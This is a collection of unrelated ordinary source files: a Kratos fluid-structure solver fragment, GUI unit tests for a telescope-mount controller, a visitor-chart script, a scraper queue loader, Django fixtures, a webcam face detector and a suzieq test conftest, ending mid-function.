mappers has not been implemented yet.\\n \\\n Please, in case you are using single faced immersed bodies, set the skin entities in a unique submodelpart.\\n \\\n In case you are 
considering double faced immersed bodies (shells or membranes), set all the positive faces \\\n in a unique submodelpart and all the negative ones in another submodelpart.\")\n\n def _SetStructureNeumannCondition(self):\n\n structure_computational_submodelpart = self.structure_solver.GetComputingModelPart()\n\n # Get the maximum condition id\n max_cond_id = 0\n for condition in self.structure_solver.main_model_part.Conditions:\n max_cond_id = max(max_cond_id, condition.Id)\n\n max_cond_id = self.structure_solver.main_model_part.GetCommunicator().GetDataCommunicator().MaxAll(max_cond_id)\n\n # Set up the point load condition in the structure interface\n structure_interfaces_list = self.settings[\"coupling_settings\"][\"structure_interfaces_list\"]\n for i in range(structure_interfaces_list.size()):\n interface_submodelpart_name = structure_interfaces_list[i].GetString()\n interface_submodelpart_i = self.structure_solver.main_model_part.GetSubModelPart(interface_submodelpart_name)\n\n # Get the number of conditions to be set in each processor\n local_nodes_number_accumulated = -1\n local_nodes_number = len(interface_submodelpart_i.GetCommunicator().LocalMesh().Nodes)\n local_nodes_number_accumulated = interface_submodelpart_i.GetCommunicator().ScanSum(local_nodes_number, local_nodes_number_accumulated)\n\n # Create the point load condition\n aux_count = max_cond_id + local_nodes_number_accumulated\n if self.domain_size == 2:\n for node in interface_submodelpart_i.GetCommunicator().LocalMesh().Nodes:\n aux_count+=1\n structure_computational_submodelpart.CreateNewCondition(\"PointLoadCondition2D1N\",\n int(aux_count),\n [node.Id],\n self.structure_solver.main_model_part.Properties[0])\n elif self.domain_size == 3:\n for node in interface_submodelpart_i.GetCommunicator().LocalMesh().Nodes:\n aux_count+=1\n structure_computational_submodelpart.CreateNewCondition(\"PointLoadCondition3D1N\",\n int(aux_count),\n [node.Id],\n self.structure_solver.main_model_part.Properties[0])\n\n def _ComputeMeshPredictionSingleFaced(self):\n\n print(\"Computing time step \",self.fluid_solver.main_model_part.ProcessInfo[KratosMultiphysics.STEP],\" prediction...\")\n # Get the previous step fluid interface nodal fluxes\n keep_sign = False\n distribute_load = True\n self.interface_mapper.FluidToStructure_VectorMap(KratosMultiphysics.REACTION,\n KratosStructural.POINT_LOAD,\n keep_sign,\n distribute_load)\n\n # Solve the current step structure problem with the previous step fluid interface nodal fluxes\n self.structure_solver.SolveSolutionStep()\n\n # Map the obtained structure displacement to the fluid interface\n keep_sign = True\n distribute_load = False\n self.interface_mapper.StructureToFluid_VectorMap(KratosMultiphysics.DISPLACEMENT,\n KratosMultiphysics.MESH_DISPLACEMENT,\n keep_sign,\n distribute_load)\n\n # Solve the mesh problem\n self.mesh_solver.InitializeSolutionStep()\n self.mesh_solver.Predict()\n self.mesh_solver.SolveSolutionStep()\n self.mesh_solver.FinalizeSolutionStep()\n\n print(\"Mesh prediction computed.\")\n\n\n def _ComputeMeshPredictionDoubleFaced(self):\n\n print(\"Computing time step \",self.fluid_solver.main_model_part.ProcessInfo[KratosMultiphysics.STEP],\"double faced prediction...\")\n # Get the previous step fluid interface nodal fluxes from both positive and negative faces\n keep_sign = False\n distribute_load = True\n self.interface_mapper.PositiveFluidToStructure_VectorMap(KratosMultiphysics.REACTION,\n KratosFSI.POSITIVE_MAPPED_VECTOR_VARIABLE,\n keep_sign,\n distribute_load)\n 
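# Repeat the mapping for the negative face; both face contributions are\n        # summed into the structural POINT_LOAD below before the structural solve.\n        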
self.interface_mapper.NegativeFluidToStructure_VectorMap(KratosMultiphysics.REACTION,\n KratosFSI.NEGATIVE_MAPPED_VECTOR_VARIABLE,\n keep_sign,\n distribute_load)\n\n # Add the two faces contributions to the POINT_LOAD variable\n # TODO: Add this to the variables utils\n for node in self._GetStructureInterfaceSubmodelPart().Nodes:\n pos_face_force = node.GetSolutionStepValue(KratosFSI.POSITIVE_MAPPED_VECTOR_VARIABLE)\n neg_face_force = node.GetSolutionStepValue(KratosFSI.NEGATIVE_MAPPED_VECTOR_VARIABLE)\n node.SetSolutionStepValue(KratosStructural.POINT_LOAD, 0, pos_face_force+neg_face_force)\n\n # Solve the current step structure problem with the previous step fluid interface nodal fluxes\n self.structure_solver.SolveSolutionStep()\n\n # Map the obtained structure displacement to both positive and negative fluid interfaces\n keep_sign = True\n distribute_load = False\n self.interface_mapper.StructureToPositiveFluid_VectorMap(KratosMultiphysics.DISPLACEMENT,\n KratosMultiphysics.MESH_DISPLACEMENT,\n keep_sign,\n distribute_load)\n self.interface_mapper.StructureToNegativeFluid_VectorMap(KratosMultiphysics.DISPLACEMENT,\n KratosMultiphysics.MESH_DISPLACEMENT,\n keep_sign,\n distribute_load)\n\n # Solve the mesh problem\n self.mesh_solver.InitializeSolutionStep()\n self.mesh_solver.Predict()\n self.mesh_solver.SolveSolutionStep()\n self.mesh_solver.FinalizeSolutionStep()\n\n print(\"Mesh prediction computed.\")\n","sub_path":"applications/FSIApplication/python_scripts/partitioned_fsi_base_solver.py","file_name":"partitioned_fsi_base_solver.py","file_ext":"py","file_size_in_byte":29665,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"206891116","text":"############################################################\n# -*- coding: utf-8 -*-\n#\n# # # # # # #\n# ## ## # ## # #\n# # # # # # # # # # #\n# # ## # ## ## ######\n# # # # # # #\n#\n# Python-based Tool for interaction with the 10micron mounts\n# GUI with PyQT5 for python\n#\n# written in python3, (c) 2019-2021 by mworion\n# Licence APL2.0\n#\n###########################################################\n# standard libraries\nimport unittest.mock as mock\nimport pytest\nimport glob\nimport os\nimport gc\nimport shutil\n\n# external packages\nfrom PyQt5.QtCore import QObject\nfrom PyQt5.QtGui import QCloseEvent\nfrom PyQt5.QtCore import pyqtSignal\nfrom PyQt5.QtCore import QThreadPool\nfrom PyQt5.QtWidgets import QPushButton\nfrom PyQt5.QtCore import QTimer\nfrom mountcontrol.qtmount import Mount\nfrom skyfield.api import wgs84\nfrom skyfield.api import load\n\n# local import\nfrom tests.baseTestSetupMainWindow import App\nfrom gui.mainWindow.mainW import MainWindow\n\n\n@pytest.fixture(autouse=True, scope='module')\ndef module(qapp):\n yield\n\n\n@pytest.fixture(autouse=True, scope='function')\ndef function(module):\n\n window = MainWindow(App())\n yield window\n\n\ndef test_mwSuper(function):\n suc = function.mwSuper('')\n assert suc\n\n\ndef test_initConfig_1(function):\n function.app.config['mainW'] = {}\n with mock.patch.object(function,\n 'mwSuper'):\n suc = function.initConfig()\n assert suc\n\n\ndef test_initConfig_2(function):\n del function.app.config['mainW']\n with mock.patch.object(function,\n 'mwSuper'):\n suc = function.initConfig()\n assert suc\n\n\ndef test_initConfig_3(function):\n function.app.config['mainW'] = {}\n function.app.config['mainW']['winPosX'] = 10000\n function.app.config['mainW']['winPosY'] = 10000\n with mock.patch.object(function,\n 'mwSuper'):\n suc = 
function.initConfig()\n assert suc\n\n\ndef test_storeConfigExtendedWindows_1(function):\n suc = function.storeConfigExtendedWindows()\n assert suc\n\n\ndef test_storeConfig_1(function):\n with mock.patch.object(function,\n 'mwSuper'):\n suc = function.storeConfig()\n assert suc\n\n\ndef test_storeConfig_2(function):\n del function.app.config['mainW']\n with mock.patch.object(function,\n 'mwSuper'):\n suc = function.storeConfig()\n assert suc\n\n\ndef test_closeEvent_1(function, qtbot):\n function.closeEvent(QCloseEvent())\n\n\ndef test_quitSave_1(function, qtbot):\n function.ui.profile.setText('test')\n suc = function.quitSave()\n assert suc\n\n\ndef test_setupIcons(function):\n suc = function.setupIcons()\n assert suc\n\n\ndef test_updateMountConnStat_1(function):\n suc = function.updateMountConnStat(True)\n assert suc\n assert function.deviceStat['mount']\n\n\ndef test_updateMountConnStat_2(function):\n suc = function.updateMountConnStat(False)\n assert suc\n assert not function.deviceStat['mount']\n\n\ndef test_updateMountWeatherStat_1(function):\n class S:\n weatherPressure = None\n weatherTemperature = None\n weatherStatus = None\n\n suc = function.updateMountWeatherStat(S())\n assert suc\n assert function.deviceStat['directWeather'] is None\n\n\ndef test_updateMountWeatherStat_2(function):\n class S:\n weatherPressure = 1000\n weatherTemperature = 10\n weatherStatus = None\n\n suc = function.updateMountWeatherStat(S())\n assert suc\n assert not function.deviceStat['directWeather']\n\n\ndef test_updateMountWeatherStat_3(function):\n class S:\n weatherPressure = 1000\n weatherTemperature = 10\n weatherStatus = True\n\n suc = function.updateMountWeatherStat(S())\n assert suc\n assert function.deviceStat['directWeather']\n\n\ndef test_smartFunctionGui_1(function):\n function.deviceStat['mount'] = True\n function.deviceStat['camera'] = True\n function.deviceStat['astrometry'] = True\n function.app.data.buildP = [(0, 0)]\n suc = function.smartFunctionGui()\n assert suc\n assert function.ui.runModel.isEnabled()\n assert function.ui.plateSolveSync.isEnabled()\n\n\ndef test_smartFunctionGui_2(function):\n function.deviceStat['mount'] = True\n function.deviceStat['camera'] = False\n function.deviceStat['astrometry'] = True\n function.app.data.buildP = [(0, 0)]\n suc = function.smartFunctionGui()\n assert suc\n assert not function.ui.runModel.isEnabled()\n assert not function.ui.plateSolveSync.isEnabled()\n\n\ndef test_smartFunctionGui_3(function):\n function.deviceStat['mount'] = True\n suc = function.smartFunctionGui()\n assert suc\n assert function.ui.batchModel.isEnabled()\n\n\ndef test_smartFunctionGui_4(function):\n function.deviceStat['mount'] = False\n suc = function.smartFunctionGui()\n assert suc\n assert not function.ui.batchModel.isEnabled()\n\n\ndef test_smartFunctionGui_5(function):\n function.deviceStat['environOverall'] = None\n suc = function.smartFunctionGui()\n assert suc\n assert not function.ui.refractionGroup.isEnabled()\n assert not function.ui.setRefractionManual.isEnabled()\n\n\ndef test_smartFunctionGui_6(function):\n function.deviceStat['environOverall'] = True\n function.deviceStat['mount'] = True\n suc = function.smartFunctionGui()\n assert suc\n assert function.ui.refractionGroup.isEnabled()\n assert function.ui.setRefractionManual.isEnabled()\n\n\ndef test_smartFunctionGui_7(function):\n function.deviceStat['environOverall'] = True\n function.deviceStat['mount'] = False\n suc = function.smartFunctionGui()\n assert suc\n assert not 
function.ui.refractionGroup.isEnabled()\n assert not function.ui.setRefractionManual.isEnabled()\n\n\ndef test_smartTabGui_1(function):\n suc = function.smartTabGui()\n assert suc\n\n\ndef test_mountBoot1(function, qtbot):\n with mock.patch.object(function.app.mount,\n 'bootMount',\n return_value=True):\n with qtbot.waitSignal(function.app.message) as blocker:\n suc = function.mountBoot()\n assert suc\n assert ['Sent boot command to mount', 0] == blocker.args\n\n\ndef test_smartEnvironGui_1(function):\n function.deviceStat['directWeather'] = False\n function.deviceStat['sensorWeather'] = False\n function.deviceStat['onlineWeather'] = False\n function.deviceStat['skymeter'] = False\n function.deviceStat['powerWeather'] = False\n suc = function.smartEnvironGui()\n assert suc\n assert not function.ui.directWeatherGroup.isEnabled()\n assert not function.ui.sensorWeatherGroup.isEnabled()\n assert not function.ui.onlineWeatherGroup.isEnabled()\n assert not function.ui.skymeterGroup.isEnabled()\n assert not function.ui.powerGroup.isEnabled()\n\n\ndef test_smartEnvironGui_2(function):\n function.deviceStat['directWeather'] = True\n function.deviceStat['sensorWeather'] = True\n function.deviceStat['onlineWeather'] = True\n function.deviceStat['skymeter'] = True\n function.deviceStat['powerWeather'] = True\n suc = function.smartEnvironGui()\n assert suc\n assert function.ui.directWeatherGroup.isEnabled()\n assert function.ui.sensorWeatherGroup.isEnabled()\n assert function.ui.onlineWeatherGroup.isEnabled()\n assert function.ui.skymeterGroup.isEnabled()\n assert function.ui.powerGroup.isEnabled()\n\n\ndef test_smartEnvironGui_3(function):\n function.deviceStat['directWeather'] = None\n function.deviceStat['sensorWeather'] = None\n function.deviceStat['onlineWeather'] = None\n function.deviceStat['skymeter'] = None\n function.deviceStat['powerWeather'] = False\n suc = function.smartEnvironGui()\n assert suc\n assert not function.ui.directWeatherGroup.isEnabled()\n assert not function.ui.sensorWeatherGroup.isEnabled()\n assert not function.ui.onlineWeatherGroup.isEnabled()\n assert not function.ui.skymeterGroup.isEnabled()\n assert not function.ui.powerGroup.isEnabled()\n\n\ndef test_updateWindowsStats_1(function):\n function.function.uiWindows = {'showMessageW': {'classObj': 1,\n 'button': QPushButton()}}\n suc = function.updateWindowsStats()\n assert suc\n\n\ndef test_updateDeviceStats_1(function):\n function.deviceStat = {'online': True}\n function.refractionSource = 'online'\n suc = function.updateDeviceStats()\n assert suc\n assert function.deviceStat['environOverall']\n\n\ndef test_updateDeviceStats_2(function):\n function.deviceStat = {'test': True}\n function.refractionSource = 'online'\n suc = function.updateDeviceStats()\n assert suc\n assert function.deviceStat['environOverall'] is None\n\n\ndef test_updateDeviceStats_3(function):\n function.deviceStat = {'online': True}\n function.refractionSource = 'online'\n suc = function.updateDeviceStats()\n assert suc\n\n\ndef test_updateDeviceStats_4(function):\n function.deviceStat = {}\n function.refractionSource = 'online'\n suc = function.updateDeviceStats()\n assert suc\n\n\ndef test_updateOnlineWeatherStat_1(function):\n suc = function.updateOnlineWeatherStat(True)\n assert suc\n assert function.deviceStat['onlineWeather']\n\n\ndef test_updateOnlineWeatherStat_2(function):\n suc = function.updateOnlineWeatherStat(False)\n assert suc\n assert not function.deviceStat['onlineWeather']\n\n\ndef test_updateTime_1(function):\n 
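# updateTime() should succeed with the online checkbox enabled.\n    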
function.ui.isOnline.setChecked(True)\n suc = function.updateTime()\n assert suc\n\n\ndef test_updateTime_2(function):\n function.ui.isOnline.setChecked(False)\n suc = function.updateTime()\n assert suc\n\n\ndef test_updateAstrometryStatus(function):\n suc = function.updateAstrometryStatus('test')\n assert suc\n assert function.ui.astrometryText.text() == 'test'\n\n\ndef test_updateDomeStatus(function):\n suc = function.updateDomeStatus('test')\n assert suc\n assert function.ui.domeText.text() == 'test'\n\n\ndef test_updateCameraStatus(function):\n suc = function.updateCameraStatus('test')\n assert suc\n assert function.ui.cameraText.text() == 'test'\n\n\ndef test_updateStatusGUI_1(function):\n class OB:\n @staticmethod\n def statusText(function):\n return None\n\n function.app.mount.obsSite.status = 0\n suc = function.updateStatusGUI(OB)\n assert suc\n\n\ndef test_updateStatusGUI_2(function):\n class OB:\n @staticmethod\n def statusText(function):\n return 'test'\n\n function.app.mount.obsSite.status = 0\n suc = function.updateStatusGUI(OB)\n assert suc\n assert function.ui.statusText.text() == 'test'\n\n\ndef test_updateStatusGUI_3(function):\n class OB:\n @staticmethod\n def statusText(function):\n return None\n\n function.app.mount.obsSite.status = 5\n suc = function.updateStatusGUI(OB)\n assert suc\n\n\ndef test_updateStatusGUI_4(function):\n class OB:\n @staticmethod\n def statusText(function):\n return None\n\n function.app.mount.obsSite.status = 1\n suc = function.updateStatusGUI(OB)\n assert suc\n\n\ndef test_deleteWindowResource_1(function):\n suc = function.deleteWindowResource()\n assert not suc\n\n\ndef test_deleteWindowResource_2(function):\n suc = function.deleteWindowResource(widget=function.ui.openImageW)\n assert suc\n\n\ndef test_deleteWindowResource_3(function):\n class Test:\n @staticmethod\n def objectName(function):\n return 'ImageDialog'\n\n with mock.patch.object(gc,\n 'collect'):\n suc = function.deleteWindowResource(widget=Test())\n assert suc\n\n\ndef test_buildWindow_1(function):\n class Test(QObject):\n destroyed = pyqtSignal()\n\n function.uiWindows['showImageW']['classObj'] = Test()\n\n suc = function.buildWindow('showImageW')\n assert suc\n\n\ndef test_toggleWindow_1(function):\n suc = function.toggleWindow()\n assert suc\n\n\ndef test_toggleWindow_2(function):\n def Sender(function):\n return function.ui.openImageW\n\n function.sender = Sender\n function.uiWindows['showImageW']['classObj'] = None\n\n with mock.patch.object(function,\n 'buildWindow'):\n suc = function.toggleWindow()\n assert suc\n\n\ndef test_toggleWindow_3(function):\n def Sender(function):\n return function.ui.openImageW\n\n function.sender = Sender\n function.uiWindows['showImageW']['classObj'] = 1\n\n suc = function.toggleWindow()\n assert suc\n\n\ndef test_showExtendedWindows_1(function):\n with mock.patch.object(function,\n 'buildWindow'):\n suc = function.showExtendedWindows()\n assert suc\n\n\ndef test_closeExtendedWindows_1(function):\n suc = function.closeExtendedWindows()\n assert suc\n\n\ndef test_checkExtension_1(function):\n val = function.checkExtension('tests/image/test.fit', 'fit')\n assert val == 'tests/image/test.fit'\n\n\ndef test_checkExtension_2(function):\n val = function.checkExtension('tests/image/test', '.fit')\n assert val == 'tests/image/test.fit'\n\n\ndef test_mountBoot2(function, qtbot):\n with mock.patch.object(function.app.mount,\n 'bootMount',\n return_value=False):\n with qtbot.waitSignal(function.app.message) as blocker:\n suc = function.mountBoot()\n 
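# A failing boot is expected to return False and to report the error via the message signal.\n            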
assert not suc\n assert ['Mount cannot be booted', 2] == blocker.args\n\n\ndef test_mountShutdown1(function, qtbot):\n with mock.patch.object(function.app.mount.obsSite,\n 'shutdown',\n return_value=True):\n with qtbot.waitSignal(function.app.message) as blocker:\n suc = function.mountShutdown()\n assert suc\n assert ['Shutting mount down', 0] == blocker.args\n\n\ndef test_mountShutdown2(function, qtbot):\n with mock.patch.object(function.app.mount.obsSite,\n 'shutdown',\n return_value=False):\n with qtbot.waitSignal(function.app.message) as blocker:\n suc = function.mountShutdown()\n assert not suc\n assert ['Mount cannot be shutdown', 2] == blocker.args\n\n\ndef test_saveProfile1(function, qtbot):\n with mock.patch.object(function.app,\n 'saveConfig',\n return_value=True):\n with qtbot.waitSignal(function.app.message) as blocker:\n app.saveProfile()\n assert ['Actual profile saved', 0] == blocker.args\n\n\ndef test_loadProfile1(function, qtbot):\n with mock.patch.object(function,\n 'openFile',\n return_value=('config', 'test', 'cfg')):\n with mock.patch.object(function.app,\n 'loadConfig',\n return_value=True):\n with mock.patch.object(function,\n 'closeExtendedWindows'):\n with mock.patch.object(function,\n 'showExtendedWindows'):\n with mock.patch.object(function,\n 'initConfig'):\n with qtbot.waitSignal(function.app.message) as blocker:\n suc = function.loadProfile()\n assert suc\n assert ['Profile [test] loaded', 0] == blocker.args\n\n\ndef test_loadProfile2(function, qtbot):\n with mock.patch.object(function,\n 'openFile',\n return_value=('config', 'test', 'cfg')):\n with mock.patch.object(function.app,\n 'loadConfig',\n return_value=False):\n with mock.patch.object(function,\n 'closeExtendedWindows'):\n with mock.patch.object(function,\n 'showExtendedWindows'):\n with mock.patch.object(function,\n 'initConfig'):\n with qtbot.waitSignal(function.app.message) as blocker:\n suc = function.loadProfile()\n assert suc\n assert ['Profile [test] cannot no be loaded', 2] == blocker.args\n\n\ndef test_loadProfile3(function, qtbot):\n with mock.patch.object(function,\n 'openFile',\n return_value=(None, None, 'cfg')):\n suc = function.loadProfile()\n assert not suc\n\n\ndef test_saveProfileAs1(function, qtbot):\n with mock.patch.object(function,\n 'saveFile',\n return_value=('config', 'test', 'cfg')):\n with mock.patch.object(function.app,\n 'saveConfig',\n return_value=True):\n with qtbot.waitSignal(function.app.message) as blocker:\n suc = function.saveProfileAs()\n assert suc\n assert ['Profile [test] saved', 0] == blocker.args\n\n\ndef test_saveProfileAs2(function, qtbot):\n with mock.patch.object(function,\n 'saveFile',\n return_value=('config', 'test', 'cfg')):\n with mock.patch.object(function.app,\n 'saveConfig',\n return_value=False):\n with qtbot.waitSignal(function.app.message) as blocker:\n suc = function.saveProfileAs()\n assert suc\n assert ['Profile [test] cannot no be saved', 2] == blocker.args\n\n\ndef test_saveProfileAs3(function, qtbot):\n with mock.patch.object(function,\n 'saveFile',\n return_value=(None, None, 'cfg')):\n suc = function.saveProfileAs()\n assert not suc\n\n\ndef test_saveProfile2(function, qtbot):\n with mock.patch.object(function.app,\n 'saveConfig',\n return_value=False):\n with qtbot.waitSignal(function.app.message) as blocker:\n function.saveProfile()\n assert ['Actual profile cannot not be saved', 2] == blocker.args\n\n\ndef test_remoteCommand_1(function):\n suc = function.remoteCommand('')\n assert suc\n\n\ndef test_remoteCommand_2(function, qtbot):\n 
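# The bare 'shutdown' command should be routed to the application's quitSave handler.\n    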
with qtbot.waitSignal(function.app.message) as blocker:\n with mock.patch.object(function.app,\n 'quitSave'):\n suc = function.remoteCommand('shutdown')\n assert suc\n assert ['Actual profile cannot not be saved', 2] == blocker.args\n\n\ndef test_remoteCommand_3(function, qtbot):\n with qtbot.waitSignal(function.app.message) as blocker:\n with mock.patch.object(function,\n 'mountShutdown'):\n suc = function.remoteCommand('shutdown mount')\n assert suc\n assert ['Shutdown mount remotely', 2] == blocker.args\n\n\ndef test_remoteCommand_4(function, qtbot):\n with qtbot.waitSignal(function.app.message) as blocker:\n with mock.patch.object(function,\n 'mountBoot'):\n suc = function.remoteCommand('boot mount')\n assert suc\n assert ['Boot mount remotely', 2] == blocker.args\n","sub_path":"tests/unit_tests/gui/mainWindow/t_mainW_new.py","file_name":"t_mainW_new.py","file_ext":"py","file_size_in_byte":19413,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"45424318","text":"import csv\nimport pygal\nimport os\n\n#Returns info from the csv file as tuple\ndef get_file_info(file):\n\n\tJahr = []\n\tBesucher = []\n\tZeitProBesucher = []\n\tAnsichtszeitProBesucher = []\n\n\twith open(file) as csvfile:\n\t filereader = csv.DictReader(csvfile, delimiter = \";\")\n\n\t #Insert data into arrays\n\t for row in filereader:\n\t #print(row)\n\t Jahr.append(int(row[\"Jahr\"].split(\" \")[0]))\n\t Besucher.append(int(row[\"Besucher\"]))\n\t ZeitProBesucher.append(row[\"Ansichtszeit pro Seite\"])#\n\n\t Ansichtszeit = row[\"Ansichtszeit pro Besucher\"].split(\":\")\n\t Ansichtszeit.pop(0)\n\t TimeSec = int(Ansichtszeit[0]) * 60 + int(Ansichtszeit[1])\n\t \n\t AnsichtszeitProBesucher.append(TimeSec)\n\n\treturn (Jahr, Besucher, AnsichtszeitProBesucher)\n\n\nfile = \"Besucher pro Jahr_1_März2016.csv\"\nInfos = get_file_info(file)\n\n#Create chart\nchart = pygal.HorizontalBar()\nchart.title = \"Besucher pro Jahr auf Moers.de\"\n\ncounter = 0\nfor jahr in Infos[0]:\n\n\tchart.add(str(jahr) , Infos[1][counter])\n\tcounter += 1\n\n\nchart.render_to_file(\"user_per_year_chart.svg\", force_uri_protocol=\"https\")","sub_path":"besucher_jahr.py","file_name":"besucher_jahr.py","file_ext":"py","file_size_in_byte":1123,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"92363707","text":"# -*- coding: utf-8 -*-\n\n# 在工程之外加start_url\n\nfrom scrapy_redis.multione import StartUrl\nfrom scrapy_redis.queue import StartUrlQueue\n\ns = StartUrlQueue()\n\nfor i in range(20):\n url = 'http://cydj.5anquan.com/UILogin/BeforeUserInfoShow?id=' + str(i)\n start_url = StartUrl(url=url, callback='haina.parses.aqpjs.SafetyEvalueSpider.parse_info', dont_filter=True,\n priority=0)\n s.push(starturl=start_url)\n","sub_path":"examples/add_start_url.py","file_name":"add_start_url.py","file_ext":"py","file_size_in_byte":443,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"140122969","text":"from datetime import datetime\n\nfrom django.utils import timezone\n\nimport pytest\n\nfrom apps.visits import choices\nfrom factories import visits as factories\n\n\n@pytest.fixture\ndef visit_no_reason(child):\n year = timezone.now().year\n day = datetime(year, 6, 1)\n return factories.VisitFactory(\n date=day,\n reason=choices.NO_REASON,\n child=child,\n description=None\n )\n\n\n@pytest.fixture\ndef visit_illness(child):\n year = timezone.now().year\n day = datetime(year, 6, 2)\n return 
factories.VisitFactory(\n date=day,\n reason=choices.ILLNESS,\n child=child,\n )\n","sub_path":"tests/fixtures/visits.py","file_name":"visits.py","file_ext":"py","file_size_in_byte":620,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"411554275","text":"import cv2\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\n\nface_cascade = cv2.CascadeClassifier('haarcascade_frontalface_default.xml')\nprint(\"dgsg\")\n\n\n\ncap = cv2.VideoCapture(0)\nwhile True:\n \n \n ret , frame = cap.read(0) \n\n face_rects = face_cascade.detectMultiScale(frame,scaleFactor=1.2,minNeighbors= 5)\n \n for (x,y,w,h) in face_rects:\n cv2.rectangle(frame,(x,y),(x+w,y+h),(255,255,255),10)\n \n cv2.imshow('video face detect',frame) \n \n k = cv2.waitKey(1)\n if k == 27:\n break\n \ncap.release()\ncv2.destroyAllWindows()","sub_path":"face.py","file_name":"face.py","file_ext":"py","file_size_in_byte":581,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"350827066","text":"from filelock import FileLock\nfrom subprocess import check_output, CalledProcessError\nimport shlex\nfrom tempfile import mkstemp\nimport yaml\nfrom unittest.mock import Mock\nfrom suzieq.poller.services import init_services\nfrom suzieq.utils import load_sq_config, Schema\nfrom suzieq.sqobjects import get_sqobject, get_tables\nfrom suzieq.cli.sq_nubia_context import NubiaSuzieqContext\nimport asyncio\nimport sys\nimport os\nfrom _pytest.mark.structures import Mark, MarkDecorator\nimport pytest\nimport pandas as pd\n\nsuzieq_cli_path = './suzieq/cli/sq_cli.py'\nsuzieq_rest_server_path = './suzieq/restServer/sq_rest_server.py'\n\nDATADIR = ['tests/data/multidc/parquet-out/',\n 'tests/data/eos/parquet-out',\n 'tests/data/nxos/parquet-out',\n 'tests/data/junos/parquet-out',\n 'tests/data/mixed/parquet-out',\n 'tests/data/vmx/parquet-out']\n\ncommands = [('AddressCmd'), ('ArpndCmd'), ('BgpCmd'), ('DeviceCmd'),\n ('DevconfigCmd'), ('EvpnVniCmd'), ('InterfaceCmd'),\n ('InventoryCmd'), ('LldpCmd'),\n ('MacCmd'), ('MlagCmd'), ('NetworkCmd'), ('OspfCmd'),\n ('SqPollerCmd'), ('RouteCmd'), ('TopologyCmd'), ('VlanCmd')]\n\ncli_commands = [('arpnd'), ('address'), ('bgp'), ('device'), ('devconfig'),\n ('evpnVni'), ('fs'), ('interface'), ('inventory'), ('lldp'),\n ('mac'), ('mlag'), ('network'), ('ospf'), ('path'), ('route'),\n ('sqPoller'), ('topology'), ('vlan')]\n\n\ntables = get_tables()\n\n\n@pytest.fixture(scope='function')\ndef setup_nubia():\n _setup_nubia()\n\n\n@pytest.fixture()\ndef create_context_config(datadir: str = './tests/data/basic_dual_bgp/parquet-out'):\n return\n\n\n@pytest.fixture()\ndef get_table_data(table: str, datadir: str):\n\n cfgfile = create_dummy_config_file(datadir=datadir)\n\n df = get_sqobject(table)(config_file=cfgfile).get(columns=['*'])\n if not df.empty and (table != 'device'):\n device_df = get_sqobject('device')(config_file=cfgfile) \\\n .get(columns=['namespace', 'hostname', 'os'])\n\n assert not device_df.empty, 'empty device table'\n df = df.merge(device_df, on=['namespace', 'hostname']) \\\n .fillna({'os': ''})\n\n if df.empty:\n pytest.fail('empty device table')\n\n return df\n\n\n@pytest.fixture\n@pytest.mark.asyncio\ndef init_services_default(event_loop):\n configs = os.path.abspath(os.curdir) + '/config/'\n schema = configs + 'schema/'\n mock_queue = Mock()\n services = event_loop.run_until_complete(\n init_services(configs, schema, mock_queue, True))\n return services\n\n\n@pytest.fixture\ndef 
run_sequential(tmpdir):\n \"\"\"Uses a file lock to run tests using this fixture, sequentially\n\n \"\"\"\n with FileLock('test.lock', timeout=15):\n yield()\n\n\ndef _setup_nubia():\n from suzieq.cli.sq_nubia_plugin import NubiaSuzieqPlugin\n from nubia import Nubia\n # monkey patching -- there might be a better way\n plugin = NubiaSuzieqPlugin()\n plugin.create_context = create_context\n\n # this is just so that context can be created\n shell = Nubia(name='test', plugin=plugin)\n\n\ndef create_context():\n config = load_sq_config(config_file=create_dummy_config_file())\n context = NubiaSuzieqContext()\n context.cfg = config\n context.schemas = Schema(config[\"schema-directory\"])\n return context\n\n\ndef create_dummy_config_file(\n datadir: str = './tests/data/basic_dual_bgp/parquet-out'):\n config = {'data-directory': datadir,\n 'temp-directory': '/tmp/suzieq',\n 'logging-level': 'WARNING',\n 'test_set': 'basic_dual_bgp', # an extra field for testing\n 'rest': {'API_KEY': '68986cfafc9d5a2dc15b20e3e9f289eda2c79f40'},\n 'analyzer': {'timezone': 'GMT'},\n }\n fd, tmpfname = mkstemp(suffix='.yml')\n f = os.fdopen(fd, 'w')\n f.write(yaml.dump(config))\n f.close()\n\n return tmpfname\n\n\ndef load_up_the_tests(dir):\n \"\"\"reads the files from the samples directory and parametrizes the test\"\"\"\n tests = []\n\n for i in dir:\n if not i.path.endswith('.yml'):\n continue\n with open(i, 'r') as f:\n out = yaml.load(f.read(), Loader=yaml.BaseLoader)\n # The format of the YAML file assumed is as follows:\n # description: \n # tests:\n # - command: , not used yet\n # marks: \n # output: |\n # \n #\n # - command:\n # ....\n if out and 'tests' in out:\n for t in out['tests']:\n # We use tags to dynamically mark the parametrized test\n # the marks MUST be registered in pytest.ini\n markers = []\n if 'marks' in t:\n markers = [MarkDecorator(Mark(x, [], {}))\n for x in t['marks'].split()]\n if 'xfail' in t:\n except_err = None\n if 'raises' in t['xfail']:\n except_err = globals()['__builtins__'].get(\n t['xfail']['raises'], None)\n\n if except_err:\n markers += [pytest.mark.xfail(\n reason=t['xfail']['reason'],\n raises=except_err)]\n else:\n if 'reason' in t['xfail']:\n markers += [pytest.mark.xfail(\n reason=t['xfail']['reason'])]\n else:\n markers += [pytest.mark.xfail()]\n if markers:\n tests += [pytest.param(t, marks=markers,\n id=t['command'])]\n else:\n tests += [pytest.param(t, id=t['command'])]\n return tests\n\n\ndef setup_sqcmds(testvar, context_config):\n sqcmd_path = [sys.executable, suzieq_cli_path]\n\n if 'data-directory' in testvar:\n # We need to create a tempfile to hold the config\n cfgfile = create_dummy_config_file(datadir=testvar['data-directory'])\n sqcmd_path += ['--config={}'.format(cfgfile)]\n\n exec_cmd = sqcmd_path + shlex.split(testvar['command'])\n\n output = None\n error = None\n try:\n output = check_output(exec_cmd)\n except CalledProcessError as e:\n error = e.output\n\n if cfgfile:\n 